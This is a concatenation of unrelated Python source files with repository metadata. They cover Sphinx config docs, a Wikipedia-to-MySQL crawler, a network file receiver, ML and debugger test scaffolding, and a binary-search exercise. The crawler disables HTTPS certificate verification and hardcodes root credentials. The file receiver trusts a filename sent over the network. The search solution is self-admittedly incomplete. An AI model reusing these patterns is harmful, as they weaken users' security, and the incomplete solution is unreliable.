yield _indent(':Maximum Value: %s' % opt.type.max)
if getattr(opt.type, 'choices', None):
choices_text = ', '.join([_get_choice_text(choice)
for choice in opt.type.choices])
yield _indent(':Valid Values: %s' % choices_text)
try:
if opt.mutable:
yield _indent(
':Mutable: This option can be changed without restarting.'
)
except AttributeError as err:
# NOTE(dhellmann): keystoneauth defines its own Opt class,
# and neutron (at least) returns instances of those
# classes instead of oslo_config Opt instances. The new
# mutable attribute is the first property where the API
# isn't supported in the external class, so we can use
# this failure to emit a warning. See
# https://bugs.launchpad.net/keystoneauth/+bug/1548433 for
# more details.
import warnings
if not isinstance(cfg.Opt, opt):
warnings.warn(
'Incompatible option class for %s (%r): %s' %
(opt.dest, opt.__class__, err),
)
else:
warnings.warn('Failed to fully format sample for %s: %s' %
(opt.dest, err))
if opt.advanced:
yield _indent(
':Advanced Option: Intended for advanced users and not used')
yield _indent(
'by the majority of users, and might have a significant', 6)
yield _indent(
'effect on stability and/or performance.', 6)
if opt.sample_default:
yield _indent(
'')
yield _indent(
'This option has a sample default set, which means that')
yield _indent(
'its actual default value may vary from the one documented')
yield _indent(
'above.')
try:
help_text = opt.help % {'default': 'the value above'}
except (TypeError, KeyError, ValueError):
# There is no mention of the default in the help string,
# the string had some unknown key, or the string contained
# invalid formatting characters
help_text = opt.help
if help_text:
yield ''
for line in help_text.strip().splitlines():
yield _indent(line.rstrip())
# We don't bother outputting this if not using new-style choices with
# inline descriptions
if getattr(opt.type, 'choices', None) and not all(
x is None for x in opt.type.choices.values()):
yield ''
yield _indent('.. rubric:: Possible values')
for choice in opt.type.choices:
yield ''
yield _indent(_get_choice_text(choice))
yield _indent(_indent(
opt.type.choices[choice] or '<No description provided>'))
if opt.deprecated_opts:
yield ''
for line in _list_table(
['Group', 'Name'],
((d.group or group_name,
d.name or opt.dest or 'UNSET')
for d in opt.deprecated_opts),
title='Deprecated Variations'):
yield _indent(line)
if opt.deprecated_for_removal:
yield ''
yield _indent('.. warning::')
if opt.deprecated_since:
yield _indent(' This option is deprecated for removal '
'since %s.' % opt.deprecated_since)
else:
yield _indent(' This option is deprecated for removal.')
yield _indent(' Its value may be silently ignored ')
yield _indent(' in the future.')
if opt.deprecated_reason:
reason = ' '.join([x.strip() for x in
opt.deprecated_reason.splitlines()])
yield ''
yield _indent(' :Reason: ' + reason)
yield ''
def _format_group(namespace, group_name, group_obj):
yield '.. oslo.config:group:: %s' % group_name
if namespace:
yield ' :namespace: %s' % namespace
yield ''
if group_obj and group_obj.help:
for line in group_obj.help.strip().splitlines():
yield _indent(line.rstrip())
yield ''
def _format_group_opts(namespace, group_name, group_obj, opt_list):
group_name = group_name or 'DEFAULT'
LOG.debug('%s %s', namespace, group_name)
for line in _format_group(namespace, group_name, group_obj):
yield line
for opt in opt_list:
for line in _format_opt(opt, group_name):
yield line
def _format_option_help(namespaces, split_namespaces):
"""Generate a series of lines of restructuredtext.
Format the option help as restructuredtext and return it as a list
of lines.
"""
opts = generator._list_opts(namespaces)
if split_namespaces:
for namespace, opt_list in opts:
for group, opts in opt_list:
if isinstance(group, cfg.OptGroup):
group_name = group.name
else:
group_name = group
group = None
if group_name is None:
group_name = 'DEFAULT'
lines = _format_group_opts(
namespace=namespace,
group_name=group_name,
group_obj=group,
opt_list=opts,
)
for line in lines:
yield line
else:
# Merge the options from different namespaces that belong to
# the same group together and format them without the
# namespace.
by_section = {}
group_objs = {}
for ignore, opt_list in opts:
for group, group_opts in opt_list:
if isinstance(group, cfg.OptGroup):
group_name = group.name
else:
group_name = group
group = None
if group_name is None:
group_name = 'DEFAULT'
group_objs.setdefault(group_name, group)
by_section.setdefault(group_name, []).extend(group_opts)
for group_name, group_opts in sorted(by_section.items()):
lines = _format_group_opts(
namespace=None,
group_name=group_name,
group_obj=group_objs.get(group_name),
opt_list=group_opts,
)
for line in lines:
yield line
class ShowOptionsDirective(rst.Directive):
option_spec = {
'split-namespaces': directives.flag,
'config-file': directives.unchanged,
}
has_content = True
def run(self):
split_namespaces = 'split-namespaces' in self.options
config_file = self.options.get('config-file')
if config_file:
LOG.info('loading config file %s', config_file)
conf = cfg.ConfigOpts()
conf.register_opts(generator._generator_opts)
conf(
args=['--config-file', config_file],
project='oslo.config.sphinxext',
)
namespaces = conf.namespace[:]
else:
namespaces = [
c.strip()
for c in self.content
if c.strip()
]
result = ViewList()
source_name = self.state.document.current_source
for count, line in enumerate(_format_option_help(
namespaces, split_namespaces)):
result.append(line, source_name, count)
LOG.debug('%5d%s%s', count, ' ' if line else '', line)
node = nodes.section()
node.document = self.state.document
# With the resolution for bug #1755783, we now parse the 'Opt.help'
# attribute as rST. Unfortunately, there are a lot of broken option
# descriptions out there and we don't want to break peoples' builds
# suddenly. As a result, we disable 'warning-is-error' temporarily.
# Users will still see the warnings but the build will continue.
with logging.skip_warningiserror():
nested_parse_with_titles(self.state, result, node)
return node.children
class ConfigGroupXRefRole(XRefRole):
"Handles :oslo.config:group: roles pointing to configuration groups."
def __init__(self):
super(ConfigGroupXRefRole, self).__init__(
warn_dangling=True,
)
def process_link(self, env, refnode, has_explicit_title, title, target):
# The anchor for the group link is the group name.
return target, target
class ConfigOptXRefRole(XRefRole):
"Handles :oslo.config:option: roles pointing to configuration options."
def __init__(self):
super(ConfigOptXRefRole, self).__init__(
warn_dangling=True,
)
def process_link(self, env, refnode, has_explicit_title, title, target):
if not has_explicit_title:
title = target
if '.' in target:
group, opt_name = target.split('.')
else:
group = 'DEFAULT'
opt_name = target
anchor = _make_anchor_target(group, opt_name)
return title, anchor
class ConfigGroup(rst.Directive):
required_arguments = 1
optional_arguments = 0
has_content = True
option_spec = {
'namespace': directives.unchanged,
}
def run(self):
env = self.state.document.settings.env
group_name = self.arguments[0]
namespace = self.options.get('namespace')
cached_groups = env.domaindata['oslo.config']['groups']
# Store the current group for use later in option directives
env.temp_data['oslo.config:group'] = group_name
LOG.debug('oslo.config group %s' % group_name)
# Store the location where this group is being defined
# for use when resolving cross-references later.
# FIXME: This should take the source namespace into account, too
cached_groups[group_name] = env.docname
result = ViewList()
source_name = '<' + __name__ + '>'
def _add(text):
"Append some text to the output result view to be parsed."
result.append(text, source_name)
if namespace:
title = '%s: %s' % (namespace, group_name)
else:
title = group_name
_add(title)
_add('-' * len(title))
_add('')
for line in self.content:
_add(line)
node = nodes.section()
node.document = self.state.document
nested_parse_with_titles(self.state, result, node)
first_child = node.children[0]
# Compute the normalized target and set the node to have that
# as an id
target_name = cfg._normalize_group_name(group_name)
first_child['ids'].append(target_name)
indexnode = addnodes.index(entries=[])
return [indexnode] + node.children
class ConfigOption(ObjectDescription):
"Description of a configuration option (.. option)."
def handle_signature(self, sig, signode):
"""Transform an option description into RST nodes."""
optname = sig
LOG.debug('oslo.config option %s', optname)
# Insert a node into the output showing the option name
signode += addnodes.desc_name(optname, optname)
signode['allnames'] = [optname]
return optname
def add_target_and_index(self, firstname, sig, signode):
cached_options = self.env.domaindata['oslo.config']['options']
# Look up the current group name from the processing context
currgroup = self.env.temp_data.get('oslo.config:group')
# Compute the normalized target name for the option and give
# that to the node as an id
target_name = _make_anchor_target(currgroup, sig)
signode['ids'].append(target_name)
self.state.document.note_explicit_target(signode)
# Store the location of the option definition for later use in
# resolving cross-references
# FIXME: This should take the source namespace into account, too
cached_options[target_name] = self.env.docname
class ConfigDomain(Domain):
"""oslo.config domain."""
name = 'oslo.config'
label = 'oslo.config'
object_types = {
'configoption': ObjType('configuration option', 'option'),
}
directives = {
'group': ConfigGroup,
'option': ConfigOption,
}
roles = {
'option': ConfigOptXRefRole(),
'group': ConfigGroupXRefRole(),
}
initial_data = {
'options': {},
'groups': {},
}
def resolve_xref(self, env, fromdocname, builder,
typ, target, node, contnode):
"""Resolve cross-references"""
if typ == 'option':
group_name, option_name = target.split('.', 1)
return make_refnode(
builder,
fromdocname,
env.domaindata['oslo.config']['options'][target],
target,
contnode,
option_name,
)
if typ == 'group':
return make_refnode(
builder,
fromdocname,
env.domaindata['oslo.config']['groups'][target],
target,
contnode,
target,
)
return None
def setup(app):
# NOTE(dhellmann): Try to turn off lazy translation from oslo_i18n
# so any translated help text or deprecation messages associated
# with configuration options are treated as regular strings
# instead of Message objects. Unfortunately this is a bit
# order-dependent, and so it's still possible that importing code
# from another module such as through the autodoc features, or
# even through the plugin scanner, will turn lazy evaluation back
# on.
oslo_i18n.enable_lazy(False)
app.add_directive('show-options', ShowOptionsDirective)
app.add_domain(ConfigDomain)
return {
'parallel_read_safe': True,
'parallel_write_safe': True,
}
| 34.213592
| 76
| 0.600284
|
4a1117440d38d3c4003a0ffef4133f94fcade0f2
| 2,043
|
py
|
Python
|
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
ch6-storing-data/saveToMySQL.py
|
DarkDesire/python-scraping
|
8023a4d129f756084ac39827a8cfb98a9201deed
|
[
"Apache-2.0"
] | null | null | null |
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
import pymysql
from random import shuffle
import pymysql
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
conn = pymysql.connect(host='127.0.0.1',
user='root', passwd='admin', charset='utf8')
cur = conn.cursor()
cur.execute('USE wikipedia')
def insertPageIfNotExists(url):
cur.execute('SELECT * FROM pages WHERE url = %s', (url))
if cur.rowcount == 0:
cur.execute('INSERT INTO pages (url) VALUES (%s)', (url))
conn.commit()
return cur.lastrowid
else:
return cur.fetchone()[0]
def loadPages():
cur.execute('SELECT * FROM pages')
pages = [row[1] for row in cur.fetchall()]
return pages
def insertLink(fromPageId, toPageId):
cur.execute('SELECT * FROM links WHERE fromPageId = %s AND toPageId = %s',
(int(fromPageId), int(toPageId)))
if cur.rowcount == 0:
cur.execute('INSERT INTO links (fromPageId, toPageId) VALUES (%s, %s)',
(int(fromPageId), int(toPageId)))
conn.commit()
def pageHasLinks(pageId):
cur.execute('SELECT * FROM links WHERE fromPageId = %s', (int(pageId)))
rowcount = cur.rowcount
if rowcount == 0:
return False
return True
def getLinks(pageUrl, recursionLevel, pages):
if recursionLevel > 4:
return
pageId = insertPageIfNotExists(pageUrl)
html = urlopen('http://en.wikipedia.org{}'.format(pageUrl))
bs = BeautifulSoup(html, 'html.parser')
links = bs.findAll('a', href=re.compile('^(/wiki/)((?!:).)*$'))
links = [link.attrs['href'] for link in links]
for link in links:
linkId = insertPageIfNotExists(link)
insertLink(pageId, linkId)
if not pageHasLinks(linkId):
print("PAGE HAS NO LINKS: {}".format(link))
pages.append(link)
getLinks(link, recursionLevel+1, pages)
getLinks('/wiki/Kevin_Bacon', 0, loadPages())
cur.close()
conn.close()
| 31.921875
| 80
| 0.632403
|
4a11179e6b0281041520228a541ad20530340aaa
| 411
|
py
|
Python
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 39
|
2016-03-31T07:49:45.000Z
|
2021-09-01T10:34:02.000Z
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 48
|
2016-04-07T20:22:44.000Z
|
2021-09-26T18:12:01.000Z
|
docs/cookbook/advanced-messaging/sending_data_a.py
|
tjguk/networkzero
|
5b40e3a213f22dc82d2ce8d36925019eaaf2c06e
|
[
"MIT"
] | 15
|
2016-04-07T20:12:18.000Z
|
2019-10-25T14:31:41.000Z
|
import os, sys
import tempfile
import networkzero as nw0
address = nw0.advertise("gallery")
print("Gallery:", address)
while True:
filename, data = nw0.wait_for_message_from(address, autoreply=True)
bytes = nw0.string_to_bytes(data)
temp_filepath = os.path.join(tempfile.gettempdir(), filename)
with open(temp_filepath, "wb") as f:
f.write(bytes)
print("Wrote", temp_filepath)
| 27.4
| 71
| 0.712895
|
4a1117c66c89620a1846323d8eac41e81fcff500
| 11,005
|
py
|
Python
|
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
basicts/run.py
|
zezhishao/GuanCang_BasicTS
|
bbf82b9d08e82db78d4e9e9b11f43a676b54ad7c
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
sys.path.append(os.path.abspath(os.path.dirname(os.path.dirname(__file__))))
from argparse import ArgumentParser
from easytorch import launch_training
def parse_args():
parser = ArgumentParser(description='Run time series forecasting model in BasicTS framework based on EasyTorch!')
# parser.add_argument('-c', '--cfg', required=True, help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/HI/HI_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/Stat/Stat_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DCRNN/DCRNN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/StemGNN/StemGNN_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GraphWaveNet/GraphWaveNet_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STGCN/STGCN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/D2STGNN/D2STGNN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/MTGNN/MTGNN_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/AGCRN/AGCRN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/LSTM/LSTM_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/STNorm/STNorm_Electricity336.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/DGCRN/DGCRN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_PEMS-BAY.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GMAN/GMAN_PEMS08.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_METR-LA.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS-BAY.py', help='training config')
parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS03.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS04.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS07.py', help='training config')
# parser.add_argument('-c', '--cfg', default='basicts/options/GTS/GTS_PEMS08.py', help='training config')
parser.add_argument('--gpus', default='0', help='visible gpus')
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
launch_training(args.cfg, args.gpus)
| 90.204918
| 129
| 0.703771
|
4a1118c2a292e74b0878ecbd0f73f721c94cb6de
| 4,045
|
py
|
Python
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 305
|
2019-09-14T17:16:05.000Z
|
2022-03-31T15:05:20.000Z
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 410
|
2019-06-06T20:52:32.000Z
|
2022-01-18T14:21:48.000Z
|
lldb/test/API/functionalities/jitloader_gdb/TestJITLoaderGDB.py
|
rarutyun/llvm
|
76fa6b3bcade074bdedef740001c4528e1aa08a8
|
[
"Apache-2.0"
] | 50
|
2019-05-10T21:12:24.000Z
|
2022-01-21T06:39:47.000Z
|
"""Test for the JITLoaderGDB interface"""
import unittest2
import os
import lldb
from lldbsuite.test import lldbutil
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
class JITLoaderGDBTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
@skipTestIfFn(
lambda: "Skipped because the test crashes the test runner",
bugnumber="llvm.org/pr24702")
@expectedFailure("llvm.org/pr24702")
def test_bogus_values(self):
"""Test that we handle inferior misusing the GDB JIT interface"""
self.build()
exe = self.getBuildArtifact("a.out")
# Create a target by the debugger.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
# Launch the process, do not stop at entry point.
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
# The inferior will now pass bogus values over the interface. Make sure
# we don't crash.
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
def gen_log_file(self):
logfile = self.getBuildArtifact("jitintgdb-{}.txt".format(self.getArchitecture()))
def cleanup():
if os.path.exists(logfile):
os.unlink(logfile)
self.addTearDownHook(cleanup)
return logfile
def test_jit_int_default(self):
self.expect("settings show plugin.jit-loader.gdb.enable",
substrs=["plugin.jit-loader.gdb.enable (enum) = default"])
@skipIfWindows # This test fails on Windows during C code build
def test_jit_int_on(self):
"""Tests interface with 'enable' settings 'on'"""
self.build()
exe = self.getBuildArtifact("simple")
logfile = self.gen_log_file()
self.runCmd("log enable -f %s lldb jit" % (logfile))
self.runCmd("settings set plugin.jit-loader.gdb.enable on")
def cleanup():
self.runCmd("log disable lldb")
self.runCmd("settings set plugin.jit-loader.gdb.enable default")
self.addTearDownHook(cleanup)
# Launch the process.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
if not configuration.is_reproducer():
self.assertTrue(os.path.exists(logfile))
logcontent = open(logfile).read()
self.assertIn("SetJITBreakpoint setting JIT breakpoint", logcontent)
@skipIfWindows # This test fails on Windows during C code build
def test_jit_int_off(self):
"""Tests interface with 'enable' settings 'off'"""
self.build()
exe = self.getBuildArtifact("simple")
logfile = self.gen_log_file()
self.runCmd("log enable -f %s lldb jit" % (logfile))
self.runCmd("settings set plugin.jit-loader.gdb.enable off")
def cleanup():
self.runCmd("log disable lldb")
self.runCmd("settings set plugin.jit-loader.gdb.enable default")
self.addTearDownHook(cleanup)
# Launch the process.
target = self.dbg.CreateTarget(exe)
self.assertTrue(target, VALID_TARGET)
process = target.LaunchSimple(
None, None, self.get_process_working_directory())
self.assertTrue(process, PROCESS_IS_VALID)
self.assertEqual(process.GetState(), lldb.eStateExited)
self.assertEqual(process.GetExitStatus(), 0)
if not configuration.is_reproducer():
self.assertTrue(os.path.exists(logfile))
logcontent = open(logfile).read()
self.assertNotIn("SetJITBreakpoint setting JIT breakpoint", logcontent)
| 37.453704
| 90
| 0.655624
|
4a1118f108a55a1a20e4d1b27c2589f53b05430c
| 2,210
|
py
|
Python
|
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
leetcode/34.py
|
pingrunhuang/CodeChallenge
|
a8e5274e04c47d851836197907266418af4f1a22
|
[
"MIT"
] | null | null | null |
'''
Given an array of integers nums sorted in ascending order, find the starting and ending position of a given target value.
Your algorithm's runtime complexity must be in the order of O(log n).
If the target is not found in the array, return [-1, -1].
TODO Could not solve the corner case
'''
class Solution:
def binarySearchLowest(self, nums, left, right, target):
if left==right:
return left
while left<right:
mid = left+(right-left)//2
if nums[mid]==target:
return mid
elif nums[mid]<target:
left=mid+1
else:
right=mid
return right
def binarySearchHighest(self, nums, left, right, target):
if left==right:
return left
while left<right:
mid = left+(right-left)//2
if nums[mid]==target:
return mid if nums[mid]!=nums[mid+1] else mid+1
elif nums[mid]<target:
left=mid+1
else:
right=mid
return left
def searchRange(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: List[int]
"""
if len(nums)==0:
return [-1,-1]
if len(nums)==1:
if nums[0]==target:
return [0,0]
else:
return [-1,-1]
l = 0
r = len(nums)-1
highest = -1
lowest = -1
while l<r:
mid = l + (r-l)//2
if nums[mid]==target:
lowest = self.binarySearchLowest(nums, l, mid, target)
highest = self.binarySearchHighest(nums, mid, r, target)
return [lowest, highest]
elif nums[mid]<target:
l = mid+1
else:
r = mid
return [lowest, highest]
if __name__ == "__main__":
s = Solution()
nums = [5,7,7,8,8,10]
print(s.searchRange(nums, 8))
print(s.searchRange(nums, 6))
nums = [2,2]
print(s.searchRange(nums, 2))
nums = [1,4]
print(s.searchRange(nums,4))
nums=[1,2,5,5,5,9]
print(s.searchRange(nums, 5))
| 29.078947
| 121
| 0.499548
|
4a11190eae860050c3ccca11b79bc0c8b6e86f2d
| 939
|
py
|
Python
|
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | 2
|
2020-04-12T01:23:25.000Z
|
2021-05-22T13:46:00.000Z
|
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | null | null | null |
examples/multi-column-autocompletion.py
|
davidbrochart/python-prompt-toolkit
|
8498692b31671fee7c5a426300a9df2ee290eae2
|
[
"BSD-3-Clause"
] | 2
|
2016-12-30T23:57:44.000Z
|
2021-05-22T13:50:21.000Z
|
#!/usr/bin/env python
"""
Similar to the autocompletion example. But display all the completions in multiple columns.
"""
from __future__ import unicode_literals
from prompt_toolkit.contrib.completers import WordCompleter
from prompt_toolkit import prompt
animal_completer = WordCompleter([
'alligator',
'ant',
'ape',
'bat',
'bear',
'beaver',
'bee',
'bison',
'butterfly',
'cat',
'chicken',
'crocodile',
'dinosaur',
'dog',
'dolphine',
'dove',
'duck',
'eagle',
'elephant',
'fish',
'goat',
'gorilla',
'kangoroo',
'leopard',
'lion',
'mouse',
'rabbit',
'rat',
'snake',
'spider',
'turkey',
'turtle',
], ignore_case=True)
def main():
text = prompt('Give some animals: ', completer=animal_completer, display_completions_in_columns=True)
print('You said: %s' % text)
